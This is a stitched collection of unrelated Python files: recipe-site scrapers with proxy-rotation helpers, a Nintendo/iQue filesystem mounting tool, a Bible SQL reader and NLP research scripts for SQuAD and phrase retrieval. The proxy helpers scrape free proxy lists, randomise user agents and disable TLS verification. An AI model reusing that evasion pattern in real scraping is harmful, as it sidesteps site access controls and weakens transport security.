try:
url = 'http://list.proxylistplus.com/SSL-List-1'
header = {'User-Agent': str(ua.random)}
response = requests.get(url, headers=header)
soup = BeautifulSoup(response.text, 'lxml')
proxies_table = soup.find("table", {"class": "bg"})
#print(proxies_table)
# Save proxies in the array
for row in proxies_table.find_all("tr", {"class": "cells"}):
google = row.find_all('td')[5].string
if google == "yes":
#print(row.find_all('td')[1].string)
self.proxies.append({
'ip': row.find_all('td')[1].string,
'port': row.find_all('td')[2].string
})
except:
print("broken")
# Choose a random proxy
try:
url = 'http://list.proxylistplus.com/SSL-List-2'
header = {'User-Agent': str(ua.random)}
response = requests.get(url, headers=header)
soup = BeautifulSoup(response.text, 'lxml')
proxies_table = soup.find("table", {"class": "bg"})
# print(proxies_table)
# Save proxies in the array
for row in proxies_table.find_all("tr", {"class": "cells"}):
google = row.find_all('td')[5].string
if google == "yes":
#print(row.find_all('td')[1].string)
self.proxies.append({
'ip': row.find_all('td')[1].string,
'port': row.find_all('td')[2].string
})
except:
print("broken")
        return self.proxies
def getProxy(self):
proxies = self.getProxyList()
proxies = self.getProxyList2(proxies)
proxy = random.choice(proxies)
return proxy
#### end proxy info added by ML
```
#### File: recipe-scrapers/recipe_scrapers/_proxy.py
```python
import requests
from lxml.html import fromstring
from fake_useragent import UserAgent
proxy_list_url = 'https://free-proxy-list.net/'
def get_proxies(verbose=False):
if verbose:
print("retriving updated proxy list...")
url = proxy_list_url
response = requests.get(url, verify=False)
parser = fromstring(response.text)
proxies = set()
for i in parser.xpath('//tbody/tr'):
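        # td[7] is assumed to be the HTTPS column on free-proxy-list.net at the time of
        # writing; this keeps only the rows where that column does not read "yes"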
if not i.xpath('.//td[7][contains(text(),"yes")]'):
proxy = ":".join([
i.xpath('.//td[1]/text()')[0],
i.xpath('.//td[2]/text()')[0]])
proxies.add('http://' + proxy)
if verbose:
print("Found %s avaliable proxies." % len(proxies))
return list(proxies)
__all__ = ['get_proxies']
def get_user_agents_generator(verbose=False, verify_ssl=False):
if verbose:
print("retriving updated user-agent list...")
ua = UserAgent(verify_ssl=verify_ssl)
ua.update()
if verbose:
print("Done.")
return ua
__all__ += ['get_user_agents_generator']
```
#### File: recipe-scrapers/recipe_scrapers/taste.py
```python
from ._abstract import AbstractScraper
from ._utils import get_minutes, normalize_string
class Taste(AbstractScraper):
@classmethod
def host(self):
return ['taste.com.au']
def title(self):
return self.soup.find('h1').get_text()
def ingredients(self):
ingredients_html = self.soup.findAll('div', {'class': 'ingredient-description'})
return [
normalize_string(ingredient.get_text())
for ingredient in ingredients_html
]
def instructions(self):
instructions_html = self.soup.findAll('div', {'class': 'recipe-method-step-content'})
return '\n'.join([
normalize_string(instruction.get_text())
for instruction in instructions_html
])
def categories(self):
categories_html = self.soup.findAll('meta', {'name': 'keywords'})
return [
normalize_string(c) for category in categories_html
for c in category['content'].split(',')
]
def image_url(self):
image_html = self.soup.find('meta', {'property': 'og:image'})
return image_html['content']
``` |
{
"source": "Jhynjhiruu/ninfs",
"score": 2
} |
#### File: ninfs/gui/confighandler.py
```python
from configparser import ConfigParser
from os import environ, makedirs
from os.path import expanduser, isdir, join
from sys import platform
from threading import Lock
__all__ = ['get_bool', 'set_bool']
CONFIG_FILENAME = 'config.ini'
home = expanduser('~')
lock = Lock()
if platform == 'win32':
config_dir = join(environ['APPDATA'], 'ninfs')
elif platform == 'darwin':
config_dir = join(home, 'Library', 'Application Support', 'ninfs')
else:
# probably linux or bsd or something
# if by some chance an OS uses different paths, feel free to let me know or make a PR
config_root = environ.get('XDG_CONFIG_HOME')
if not config_root:
# check other paths in XDG_CONFIG_DIRS to see if ninfs already exists in one of them
config_roots = environ.get('XDG_CONFIG_DIRS')
if not config_roots:
config_roots = '/etc/xdg'
config_paths = config_roots.split(':')
for path in config_paths:
d = join(path, 'ninfs')
if isdir(d):
config_root = d
break
# check again to see if it was set
if not config_root:
config_root = join(home, '.config')
config_dir = join(config_root, 'ninfs')
makedirs(config_dir, exist_ok=True)
config_file = join(config_dir, CONFIG_FILENAME)
parser = ConfigParser()
# defaults
parser['update'] = {}
parser['update']['onlinecheck'] = 'false'
parser['internal'] = {}
parser['internal']['askedonlinecheck'] = 'false'
def save_config():
with lock:
print('Saving to:', config_file)
with open(config_file, 'w') as f:
parser.write(f)
def get_bool(section: 'str', key: 'str'):
return parser.getboolean(section, key)
def set_bool(section: 'str', key: 'str', value: bool):
parser.set(section, key, 'true' if value else 'false')
save_config()
# load user config if possible
loaded = parser.read(config_file)
if not loaded:
save_config()
```
#### File: ninfs/gui/outputviewer.py
```python
import tkinter as tk
import tkinter.ttk as ttk
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Iterable
class OutputViewer(ttk.Frame):
def __init__(self, parent: 'tk.BaseWidget' = None, *, output: 'Iterable[str]'):
super().__init__(parent)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.columnconfigure(1, weight=0)
scrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
scrollbar.grid(row=0, column=1, sticky=tk.NSEW)
textarea = tk.Text(self, wrap='word', yscrollcommand=scrollbar.set)
textarea.grid(row=0, column=0, sticky=tk.NSEW)
scrollbar.configure(command=textarea.yview)
for line in output:
textarea.insert(tk.END, line + '\n')
textarea.see(tk.END)
textarea.configure(state=tk.DISABLED)
```
#### File: gui/setupwizard/exefs.py
```python
import tkinter as tk
from typing import TYPE_CHECKING
from .base import WizardBase
if TYPE_CHECKING:
from .. import WizardContainer
class ExeFSSetup(WizardBase):
def __init__(self, parent: 'tk.BaseWidget' = None, *, wizardcontainer: 'WizardContainer'):
super().__init__(parent, wizardcontainer=wizardcontainer)
def callback(*_):
main_file = self.main_textbox_var.get().strip()
self.wizardcontainer.set_next_enabled(main_file)
main_container, main_textbox, main_textbox_var = self.make_file_picker('Select the ExeFS file:',
'Select ExeFS file')
main_container.pack(fill=tk.X, expand=True)
self.main_textbox_var = main_textbox_var
main_textbox_var.trace_add('write', callback)
self.set_header_suffix('ExeFS')
def next_pressed(self):
main_file = self.main_textbox_var.get().strip()
args = ['exefs', main_file]
self.wizardcontainer.show_mount_point_selector('ExeFS', args)
```
#### File: ninfs/mount/nandbb.py
```python
import logging
from errno import ENOENT, EROFS
from stat import S_IFDIR, S_IFREG
from sys import exit, argv
from typing import BinaryIO
from pyctr.util import readbe
from . import _common as _c
# _common imports these from fusepy, and prints an error if it fails; this allows less duplicated code
from ._common import FUSE, FuseOSError, Operations, LoggingMixIn, fuse_get_context, get_time, realpath
class BBNandImageMount(LoggingMixIn, Operations):
fd = 0
def __init__(self, nand_fp: BinaryIO, g_stat: dict):
self.g_stat = g_stat
self.files = {}
self.f = nand_fp
def __del__(self, *args):
try:
self.f.close()
except AttributeError:
pass
destroy = __del__
def init(self, path):
nand_size = self.f.seek(0, 2)
if nand_size != 0x4000000:
exit(f'NAND size is incorrect (expected 0x4000000, got {nand_size:#X})')
bbfs_blocks = []
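        # The 0x4000000-byte NAND holds 0x1000 blocks of 0x4000 bytes; the last
        # 0x10 blocks (0xFF0-0xFFF) carry the copies of the BBFS filesystem table read below.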
self.f.seek(0xFF0 * 0x4000)
for i in range(0x10):
bbfs_blocks.append(self.f.read(0x4000))
self.f.seek(0)
latest_seqno = -1
latest_bbfs_block = None
for i, j in enumerate(bbfs_blocks):
header = j[0x3FF4:]
magic = header[:4]
if magic == b"\0x00\0x00\0x00\0x00":
continue
if magic not in [b"BBFS", b"BBFL"]:
exit(f'Invalid BBFS magic: expected b"BBFS" or b"BBFL", got {magic.hex().upper()}')
calculated_checksum = 0
for k in range(0, 0x4000, 2):
calculated_checksum += readbe(j[k:k + 2])
if calculated_checksum & 0xFFFF != 0xCAD7:
exit(f'BBFS block {i} has an invalid checksum')
seqno = readbe(header[4:8])
if seqno > latest_seqno:
latest_seqno = seqno
latest_bbfs_block = i
        if latest_bbfs_block is None or latest_seqno == -1:
exit(f'Blank BBFS (all BBFS magics were 00000000)')
self.used = 0
for i in range(0x2000, 0x3FF4, 0x14):
entry = bbfs_blocks[latest_bbfs_block][i:i + 0x14]
valid = bool(entry[11])
u = readbe(entry[12:14])
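            # reinterpret the big-endian 16-bit start block as signed (two's complement);
            # -1 (0xFFFF) means the entry has no start block and is skipped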
start = u - (u & 0x8000) * 2
if valid and start != -1:
name = entry[:8].decode().rstrip("\x00")
ext = entry[8:11].decode().rstrip("\x00")
size = readbe(entry[16:20])
self.files[f'/{name}.{ext}'] = {'start': start, 'size': size}
self.used += size // 0x4000
fat = bbfs_blocks[latest_bbfs_block][:0x2000]
self.fat_entries = []
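        # Build the FAT as signed 16-bit entries: read() follows a file's chain block by
        # block until the -1 end-of-chain marker, treating 0, -2 and -3 as invalid.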
for i in range(0, len(fat), 2):
u = readbe(fat[i:i + 2])
s = u - (u & 0x8000) * 2
self.fat_entries.append(s)
def flush(self, path, fh):
return self.f.flush()
@_c.ensure_lower_path
def getattr(self, path, fh=None):
uid, gid, pid = fuse_get_context()
if path == '/':
st = {'st_mode': (S_IFDIR | (0o555)), 'st_nlink': 2}
elif path in self.files:
st = {'st_mode': (S_IFREG | (0o444)),
'st_size': self.files[path]['size'], 'st_nlink': 1}
else:
raise FuseOSError(ENOENT)
return {**st, **self.g_stat, 'st_uid': uid, 'st_gid': gid}
def open(self, path, flags):
self.fd += 1
return self.fd
@_c.ensure_lower_path
def readdir(self, path, fh):
yield from ('.', '..')
yield from (x[1:] for x in self.files)
@_c.ensure_lower_path
def read(self, path, size, offset, fh):
fi = self.files[path]
if offset > fi['size']:
return b''
data = bytearray()
block = fi['start']
while True:
self.f.seek(block * 0x4000)
data.extend(self.f.read(0x4000))
block = self.fat_entries[block]
if block == -1:
break
if block in [0, -2, -3]:
return b''
if len(data) != fi['size']:
return b''
if offset + size > fi['size']:
size = fi['size'] - offset
return bytes(data[offset:offset + size])
@_c.ensure_lower_path
def statfs(self, path):
return {'f_bsize': 0x4000, 'f_frsize': 0x4000, 'f_blocks': 0xFF0 - 0x40, 'f_bavail': 0xFF0 - 0x40 - self.used,
'f_bfree': 0xFF0 - 0x40 - self.used, 'f_files': len(self.files)}
@_c.ensure_lower_path
def write(self, path, data, offset, fh):
raise FuseOSError(EROFS)
def main(prog: str = None, args: list = None):
from argparse import ArgumentParser
if args is None:
args = argv[1:]
parser = ArgumentParser(prog=prog, description='Mount iQue Player NAND images.',
parents=(_c.default_argp, _c.main_args('nand', 'iQue Player NAND image')))
a = parser.parse_args(args)
opts = dict(_c.parse_fuse_opts(a.o))
if a.do:
logging.basicConfig(level=logging.DEBUG, filename=a.do)
nand_stat = get_time(a.nand)
with open(a.nand, 'rb') as f:
mount = BBNandImageMount(nand_fp=f, g_stat=nand_stat)
if _c.macos or _c.windows:
opts['fstypename'] = 'BBFS'
# assuming / is the path separator since macos. but if windows gets support for this,
# it will have to be done differently.
if _c.macos:
path_to_show = realpath(a.nand).rsplit('/', maxsplit=2)
opts['volname'] = f'iQue Player NAND ({path_to_show[-2]}/{path_to_show[-1]})'
elif _c.windows:
# volume label can only be up to 32 chars
opts['volname'] = 'iQue Player NAND'
FUSE(mount, a.mount_point, foreground=a.fg or a.d, ro=True, nothreads=True, debug=a.d,
fsname=realpath(a.nand).replace(',', '_'), **opts)
``` |
{
"source": "jhyoo1220/bible-reading-plan",
"score": 3
} |
#### File: bible-reading-plan/bible_reading_plain/sql_connector.py
```python
import sqlite3
from reading import Reading
class SQLConnector(object):
QUERY = """
SELECT * FROM {book}
WHERE chapter IN ({chapters})
ORDER BY chapter ASC, verse ASC, verseIdx ASC
"""
def __init__(self, db_file: str):
self._conn = sqlite3.connect(db_file)
self._cursor = self._conn.cursor()
def _parse_row(self, row: object) -> dict:
try:
return {
"chapter": int(row[1]),
"verse": int(row[2]),
"divided_verse": int(row[3]),
"type": int(row[4]),
"text": row[5],
}
        except (KeyError, IndexError, ValueError, TypeError):
return None
def read_text_list(self, reading: Reading) -> list:
db_params = reading.get_db_params()
formatted_query = self.QUERY.format(**db_params)
self._cursor.execute(formatted_query)
results = []
for row in self._cursor:
curr_result = self._parse_row(row)
if reading.is_target(curr_result["chapter"], curr_result["verse"]):
results.append(curr_result)
return results
def close_connection(self):
self._conn.close()
``` |
{
"source": "jhyoung09/ITAM-Crawler",
"score": 3
} |
#### File: jhyoung09/ITAM-Crawler/ITAM-Compile.py
```python
import openpyxl
# global variables
preWB = openpyxl.load_workbook('AssetInventory-PRE.xlsx')
preSheet = preWB['Computers']
postWB = openpyxl.load_workbook('AssetInventory-POST.xlsx')
postSheet = postWB['Computers']
itamReport = openpyxl.load_workbook('base.xlsx')
itamSheet = itamReport['Asset to Location Tracking All']
def getData(sheetObj):
assetData = []
print('Opening workbook...')
print('... grabbing data...')
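    # expected layout of the Computers sheet: serial number in column A, PCN in
    # column B, device type in column C and user id in column F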
for row in range(2, sheetObj.max_row + 1):
PCN = sheetObj.cell(row=row, column=2).value
if PCN is None:
# ignore those rows which have an empty PCN (assuming that it must be present)
continue
if PCN == "n/a":
# special case to deal with integer comparison where PCN was set to n/a
PCN = 0
deviceType = sheetObj.cell(row=row, column=3).value
deviceSN = sheetObj.cell(row=row, column=1).value
userID = sheetObj.cell(row=row, column=6).value
assetData.append([PCN, deviceType, deviceSN, userID])
return assetData
def write_data(finalData):
print('writing data...')
for rowNum in range(3,len(finalData) + 3): # skipping the first 2 rows because of headers
for colNum in range(len(finalData[rowNum - 3])):
itamSheet.cell(row=rowNum, column=colNum + 1).value = finalData[rowNum - 3][colNum]
print('data written in sheet... saving workbook...')
itamReport.save('pythonCrawl_master.xlsx')
print('workbook saved...')
def gather_data(preData, postData):
preData.sort()
postDataSort = sorted(postData)
finalData = []
preIndex = 0
while preIndex < len(preData):
foundMatch = False
        for postItem in postDataSort:
            if preData[preIndex][0] == postItem[0]:
                finalData.append(preData[preIndex] + [""] + postItem)
                foundMatch = True
                postDataSort.remove(postItem)
                break  # stop after the first match; removing while iterating would skip entries
if not foundMatch:
finalData.append(preData[preIndex] + ["", "", "", "", ""])
preIndex += 1
for postItem in postDataSort:
finalData.append(["", "", "", "", ""] + postItem)
#print("This is data that has been correlated together if possible")
#for item in finalData:
# print(item)
return finalData
def main():
preAssetData = getData(preSheet)
postAssetData = getData(postSheet)
finalAssetData = gather_data(preAssetData, postAssetData)
#print(preAssetData)
#print(postAssetData)
print('...determining how much data is being parsed...')
print(len(finalAssetData))
write_data(finalAssetData)
print('...DONE!!')
main()
``` |
{
"source": "jhyrkas/wavaetable",
"score": 2
} |
#### File: jhyrkas/wavaetable/nn_osc_controller.py
```python
import librosa
import math
import numpy as np
import sounddevice as sd
import soundfile as sf
import torch
import sys
from pythonosc import osc_message_builder
from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_server import BlockingOSCUDPServer
from pythonosc.udp_client import SimpleUDPClient
from typing import List, Any
from vae_stft import vae_stft
# osc code based on https://python-osc.readthedocs.io/en/latest/dispatcher.html
z = np.zeros(16)
wt = np.zeros(512)
client = SimpleUDPClient("127.0.0.1", 7771)
def update_z(address: str, *args: List[Any]) -> None:
global z
if not address[:6] == "/param" :
return
# not doing much error checking here
i = int(address[6:])
v = float(args[0])
z[i] = v
def update_wavetable(vae) :
global wt
global z
gain = 0.75
z_size = 16
fs = 16000
length = 3
hop_length = 512
n_reps = length * int(fs / hop_length)
data_size = 1025
X_hat = vae.decode(torch.from_numpy(z).float()).detach()
x_hat = librosa.griffinlim(np.repeat(X_hat.numpy().reshape(data_size,1), n_reps, axis=1))
x_hat = gain * (x_hat / np.max(np.abs(x_hat)))
f0_hat_frames, voiced_hat, _ = librosa.pyin(x_hat, librosa.note_to_hz('C2'), librosa.note_to_hz('C7'), sr=fs)
f0_hat = np.mean(f0_hat_frames[voiced_hat]) if np.sum(voiced_hat) > 10 else 0 # at least 10 voiced frames?
if f0_hat == 0 :
print('F0 ESTIMATION FAILED')
return False # something here...
cycle_samps = 512 # for max's cycle object
new_fs = math.ceil(cycle_samps * f0_hat)
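    # resample so that one period at the estimated f0 spans exactly cycle_samps samples,
    # letting a single extracted cycle serve as the wavetable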
new_x_hat = librosa.resample(x_hat, fs, new_fs)
new_x_hat = new_x_hat / np.max(np.abs(new_x_hat))
start_index = new_fs//2 # avoid silence at beginning?
looping = True
while looping and start_index < len(new_x_hat):
if math.isclose(new_x_hat[start_index], 0.0, abs_tol=0.001) :
looping = False
else :
start_index += 1
if start_index + cycle_samps <= len(new_x_hat) :
wt = new_x_hat[start_index:start_index+cycle_samps]
return True
else :
print('ERROR IN WAVETABLE GENERATION')
return False
def send_wavetable(address: str, fixed_args: List[Any], *osc_args: List[Any]) -> None :
global client
global wt
vae = fixed_args[0]
if update_wavetable(vae) :
try :
tmp = wt.astype(np.float32)
builder = osc_message_builder.OscMessageBuilder(address="/scRecv")
builder.add_arg(tmp.tobytes(), builder.ARG_TYPE_BLOB)
message = builder.build()
client.send_message("/scRecv", message)
print('sent wavetable')
except :
# had an infinite value once but i missed the exception type or where it occurred...
client.send_message("/scErr", 0) # not sure if we have to send a "message"
def listen_to_timbre(address: str, fixed_args: List[Any], *osc_args: List[Any]) -> None :
global wt
vae = fixed_args[0]
if update_wavetable(vae) :
        gain = 0.666
        fs = 44100
        sig = np.tile(wt, (3 * fs) // len(wt)) * gain
sd.play(sig, fs)
if __name__ == '__main__' :
# OSC set up
dispatcher = Dispatcher()
# NN set up
vae = vae_stft()
vae.load_state_dict(torch.load('vae_stft_model_params.pytorch'))
vae.eval()
dispatcher.map("/param*", update_z)
dispatcher.map("/generate", send_wavetable, vae)
dispatcher.map("/listen", listen_to_timbre, vae)
server = BlockingOSCUDPServer(("127.0.0.1", 1337), dispatcher)
while True :
server.handle_request()
``` |
{
"source": "jhyuklee/biobert",
"score": 2
} |
#### File: jhyuklee/biobert/merge_yesno.py
```python
import json
import os
import argparse
import random
from tqdm import tqdm
def p_counter(data):
p_cnt = 0
for article in data:
for paragraph in article['paragraphs']:
p_cnt += 1
return p_cnt
def merge(args):
# Prepare datasets and na-probs
with open(args.gt_file, 'r') as fp:
data = json.load(fp)['data']
with open(args.na_prob_file, 'r') as fp:
na_probs = json.load(fp)
qid2ans = {}
for article in data:
for paragraph in article['paragraphs']:
for qa in paragraph['qas']:
if 'answers' in qa:
qid2ans[qa['id']] = qa['answers']
else:
qid2ans[qa['id']] = 'yes'
assert set(qid2ans.keys()) == set(na_probs.keys())
# Merge them using a single qid
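    # Each original question id was expanded into several sub-ids ("<id>_<n>");
    # average their no-answer probabilities back into one score per original id.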
merge_score = {}
merge_cnt = {}
for qid in qid2ans:
out_qid = qid.split('_')[0]
if not out_qid in merge_score:
merge_score[out_qid] = []
merge_cnt[out_qid] = 0.0
merge_score[out_qid].append(na_probs[qid])
merge_cnt[out_qid] += 1
    assert len(qid2ans) == sum(merge_cnt.values())
merge_score = {qid: sum(merge_score[qid])/merge_cnt[qid] for qid in merge_score}
# merge_score = {qid: min(merge_score[qid]) for qid in merge_score}
# Dump na_prob json
with open(args.na_prob_out_path, 'w') as fp:
json.dump(merge_score, fp)
# New dataset without duplicates
checker = []
to_data = []
for article in data:
to_article = {'paragraphs': [], 'title': article['title']}
for paragraph in article['paragraphs']:
assert len(paragraph['qas']) == 1
out_qid = paragraph['qas'][0]['id'].split('_')[0]
if out_qid in checker:
continue
else:
checker.append(out_qid)
paragraph['qas'][0]['id'] = out_qid
to_article['paragraphs'].append({'context': paragraph['context'], 'qas': paragraph['qas']})
to_data.append(to_article)
# Dump new dataset json
with open(args.gt_out_path, 'w') as fp:
json.dump({'data': to_data}, fp)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('gt_file')
parser.add_argument('na_prob_file')
parser.add_argument('gt_out_path')
parser.add_argument('na_prob_out_path')
return parser.parse_args()
def main():
args = get_args()
merge(args)
print('File merged as {} and {}\n'.format(args.gt_out_path, args.na_prob_out_path))
if __name__ == '__main__':
main()
``` |
{
"source": "jhyuklee/piqa",
"score": 2
} |
#### File: squad/base/file_interface.py
```python
import json
import os
import torch
import scipy.sparse
import numpy as np
import csv
class FileInterface(object):
def __init__(self, save_dir, report_path, pred_path, question_emb_dir, context_emb_dir,
cache_path, dump_dir, train_path, test_path, draft, **kwargs):
self._train_path = train_path
self._test_path = test_path
self._save_dir = save_dir
self._report_path = report_path
self._dump_dir = dump_dir
self._pred_path = pred_path
self._question_emb_dir = question_emb_dir
self._context_emb_dir = context_emb_dir
self._cache_path = cache_path
self._draft = draft
self._save = None
self._load = None
self._report_header = []
self._report = []
self._kwargs = kwargs
def _bind(self, save=None, load=None):
self._save = save
self._load = load
def save(self, iteration, save_fn=None):
filename = os.path.join(self._save_dir, str(iteration))
if not os.path.exists(filename):
os.makedirs(filename)
if save_fn is None:
save_fn = self._save
save_fn(filename)
def load(self, iteration, load_fn=None, session=None):
if session is None:
session = self._save_dir
filename = os.path.join(session, str(iteration), 'model.pt')
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
if load_fn is None:
load_fn = self._load
load_fn(filename)
def pred(self, pred):
if not os.path.exists(os.path.dirname(self._pred_path)):
os.makedirs(os.path.dirname(self._pred_path))
with open(self._pred_path, 'w') as fp:
json.dump(pred, fp)
print('Prediction saved at %s' % self._pred_path)
def report(self, summary=False, **kwargs):
if not os.path.exists(os.path.dirname(self._report_path)):
os.makedirs(os.path.dirname(self._report_path))
if len(self._report) == 0 and os.path.exists(self._report_path):
with open(self._report_path, 'r') as fp:
reader = csv.DictReader(fp, delimiter=',')
rows = list(reader)
for key in rows[0]:
if key not in self._report_header:
self._report_header.append(key)
self._report.extend(rows)
for key, val in kwargs.items():
if key not in self._report_header:
self._report_header.append(key)
self._report.append(kwargs)
with open(self._report_path, 'w') as fp:
writer = csv.DictWriter(fp, delimiter=',', fieldnames=self._report_header)
writer.writeheader()
writer.writerows(self._report)
return ', '.join('%s=%.5r' % (s, r) for s, r in kwargs.items())
def question_emb(self, id_, emb, emb_type='dense'):
if not os.path.exists(self._question_emb_dir):
os.makedirs(self._question_emb_dir)
savez = scipy.sparse.save_npz if emb_type == 'sparse' else np.savez
path = os.path.join(self._question_emb_dir, '%s.npz' % id_)
savez(path, emb)
def context_emb(self, id_, phrases, emb, emb_type='dense'):
if not os.path.exists(self._context_emb_dir):
os.makedirs(self._context_emb_dir)
savez = scipy.sparse.save_npz if emb_type == 'sparse' else np.savez
emb_path = os.path.join(self._context_emb_dir, '%s.npz' % id_)
json_path = os.path.join(self._context_emb_dir, '%s.json' % id_)
if os.path.exists(emb_path):
print('Skipping %s; already exists' % emb_path)
else:
savez(emb_path, emb)
if os.path.exists(json_path):
print('Skipping %s; already exists' % json_path)
else:
with open(json_path, 'w') as fp:
json.dump(phrases, fp)
def cache(self, preprocess, args):
if os.path.exists(self._cache_path):
return torch.load(self._cache_path)
out = preprocess(self, args)
torch.save(out, self._cache_path)
return out
def dump(self, batch_idx, item):
filename = os.path.join(self._dump_dir, '%s.pt' % str(batch_idx).zfill(6))
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(item, filename)
def bind(self, processor, model, optimizer=None):
def load(filename, **kwargs):
# filename = os.path.join(filename, 'model.pt')
state = torch.load(filename)
processor.load_state_dict(state['preprocessor'])
model.load_state_dict(state['model'])
if 'optimizer' in state and optimizer:
optimizer.load_state_dict(state['optimizer'])
print('Model loaded from %s' % filename)
def save(filename, **kwargs):
state = {
'preprocessor': processor.state_dict(),
'model': model.state_dict(),
'optimizer': optimizer.state_dict()
}
filename = os.path.join(filename, 'model.pt')
torch.save(state, filename)
print('Model saved at %s' % filename)
def infer(input, top_k=100):
# input = {'id': '', 'question': '', 'context': ''}
model.eval()
self._bind(save=save, load=load)
def load_train(self):
raise NotImplementedError()
def load_test(self):
raise NotImplementedError()
def load_metadata(self):
raise NotImplementedError()
```
#### File: squad/base/processor.py
```python
from abc import ABCMeta
import torch.utils.data
class Processor(metaclass=ABCMeta):
def construct(self, examples, metadata):
raise NotImplementedError()
def state_dict(self):
raise NotImplementedError()
def load_state_dict(self, in_):
raise NotImplementedError()
def preprocess(self, example):
raise NotImplementedError()
def postprocess(self, example, model_output):
raise NotImplementedError()
def postprocess_batch(self, dataset, model_input, model_output):
raise NotImplementedError()
def postprocess_context(self, example, context_output):
raise NotImplementedError()
def postprocess_context_batch(self, dataset, model_input, context_output):
raise NotImplementedError()
def postprocess_question(self, example, question_output):
raise NotImplementedError()
def postprocess_question_batch(self, dataset, model_input, question_output):
raise NotImplementedError()
def collate(self, examples):
raise NotImplementedError()
def process_metadata(self, metadata):
raise NotImplementedError()
def get_dump(self, dataset, input_, output, results):
raise NotImplementedError()
class Sampler(torch.utils.data.Sampler, metaclass=ABCMeta):
def __init__(self, dataset, data_type, **kwargs):
self.dataset = dataset
self.data_type = data_type
``` |
{
"source": "jhyuklee/sparc",
"score": 2
} |
#### File: jhyuklee/sparc/mips_phrase.py
```python
import argparse
import json
import os
import random
import logging
from collections import namedtuple, Counter
from time import time
import h5py
import numpy as np
import faiss
import torch
from tqdm import tqdm
from scipy.sparse import vstack
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
class MIPS(object):
def __init__(self, phrase_dump_dir, tfidf_dump_dir, start_index_path, idx2id_path, max_norm_path,
doc_rank_fn, cuda=False, dump_only=False):
# If dump dir is a file, use it as a dump.
if os.path.isdir(phrase_dump_dir):
self.phrase_dump_paths = sorted(
[os.path.join(phrase_dump_dir, name) for name in os.listdir(phrase_dump_dir) if 'hdf5' in name]
)
dump_names = [os.path.splitext(os.path.basename(path))[0] for path in self.phrase_dump_paths]
self.dump_ranges = [list(map(int, name.split('-'))) for name in dump_names]
else:
self.phrase_dump_paths = [phrase_dump_dir]
self.phrase_dumps = [h5py.File(path, 'r') for path in self.phrase_dump_paths]
# Load tfidf dump
assert os.path.isdir(tfidf_dump_dir), tfidf_dump_dir
self.tfidf_dump_paths = sorted(
[os.path.join(tfidf_dump_dir, name) for name in os.listdir(tfidf_dump_dir) if 'hdf5' in name]
)
tfidf_dump_names = [os.path.splitext(os.path.basename(path))[0] for path in self.tfidf_dump_paths]
if '-' in tfidf_dump_names[0]: # Range check
tfidf_dump_ranges = [list(map(int, name.split('_')[0].split('-'))) for name in tfidf_dump_names]
assert tfidf_dump_ranges == self.dump_ranges
self.tfidf_dumps = [h5py.File(path, 'r') for path in self.tfidf_dump_paths]
logger.info(f'using doc ranker functions: {doc_rank_fn["index"]}')
self.doc_rank_fn = doc_rank_fn
if dump_only:
return
# Read index
logger.info(f'Reading {start_index_path}')
self.start_index = faiss.read_index(start_index_path, faiss.IO_FLAG_ONDISK_SAME_DIR)
self.idx_f = self.load_idx_f(idx2id_path)
with open(max_norm_path, 'r') as fp:
self.max_norm = json.load(fp)
# Options
self.num_docs_list = []
self.cuda = cuda
if self.cuda:
assert torch.cuda.is_available(), f"Cuda availability {torch.cuda.is_available()}"
self.device = torch.device('cuda')
else:
self.device = torch.device("cpu")
def close(self):
for phrase_dump in self.phrase_dumps:
phrase_dump.close()
for tfidf_dump in self.tfidf_dumps:
tfidf_dump.close()
def load_idx_f(self, idx2id_path):
idx_f = {}
types = ['doc', 'word']
with h5py.File(idx2id_path, 'r', driver='core', backing_store=False) as f:
for key in tqdm(f, desc='loading idx2id'):
idx_f_cur = {}
for type_ in types:
idx_f_cur[type_] = f[key][type_][:]
idx_f[key] = idx_f_cur
return idx_f
def get_idxs(self, I):
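        # Each faiss id packs a dump-shard offset and a local index as offset*1e8 + idx;
        # unpack both and translate them to document / word ids via the idx2id tables.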
offsets = (I / 1e8).astype(np.int64) * int(1e8)
idxs = I % int(1e8)
doc = np.array(
[[self.idx_f[str(offset)]['doc'][idx] for offset, idx in zip(oo, ii)] for oo, ii in zip(offsets, idxs)])
word = np.array([[self.idx_f[str(offset)]['word'][idx] for offset, idx in zip(oo, ii)] for oo, ii in
zip(offsets, idxs)])
return doc, word
def get_doc_group(self, doc_idx):
if len(self.phrase_dumps) == 1:
return self.phrase_dumps[0][str(doc_idx)]
for dump_range, dump in zip(self.dump_ranges, self.phrase_dumps):
if dump_range[0] * 1000 <= int(doc_idx) < dump_range[1] * 1000:
if str(doc_idx) not in dump:
raise ValueError('%d not found in dump list' % int(doc_idx))
return dump[str(doc_idx)]
# Just check last
if str(doc_idx) not in self.phrase_dumps[-1]:
raise ValueError('%d not found in dump list' % int(doc_idx))
else:
return self.phrase_dumps[-1][str(doc_idx)]
def get_tfidf_group(self, doc_idx):
if len(self.tfidf_dumps) == 1:
return self.tfidf_dumps[0][str(doc_idx)]
for dump_range, dump in zip(self.dump_ranges, self.tfidf_dumps):
if dump_range[0] * 1000 <= int(doc_idx) < dump_range[1] * 1000:
return dump[str(doc_idx)]
# Just check last
if str(doc_idx) not in self.tfidf_dumps[-1]:
raise ValueError('%d not found in dump list' % int(doc_idx))
else:
return self.tfidf_dumps[-1][str(doc_idx)]
def int8_to_float(self, num, offset, factor):
return num.astype(np.float32) / factor + offset
def adjust(self, each):
last = each['context'].rfind(' [PAR] ', 0, each['start_pos'])
last = 0 if last == -1 else last + len(' [PAR] ')
next = each['context'].find(' [PAR] ', each['end_pos'])
next = len(each['context']) if next == -1 else next
each['context'] = each['context'][last:next]
each['start_pos'] -= last
each['end_pos'] -= last
return each
def scale_l2_to_ip(self, l2_scores, max_norm=None, query_norm=None):
"""
sqrt(m^2 + q^2 - 2qx) -> m^2 + q^2 - 2qx -> qx - 0.5 (q^2 + m^2)
Note that faiss index returns squared euclidean distance, so no need to square it again.
"""
if max_norm is None:
return -0.5 * l2_scores
assert query_norm is not None
return -0.5 * (l2_scores - query_norm ** 2 - max_norm ** 2)
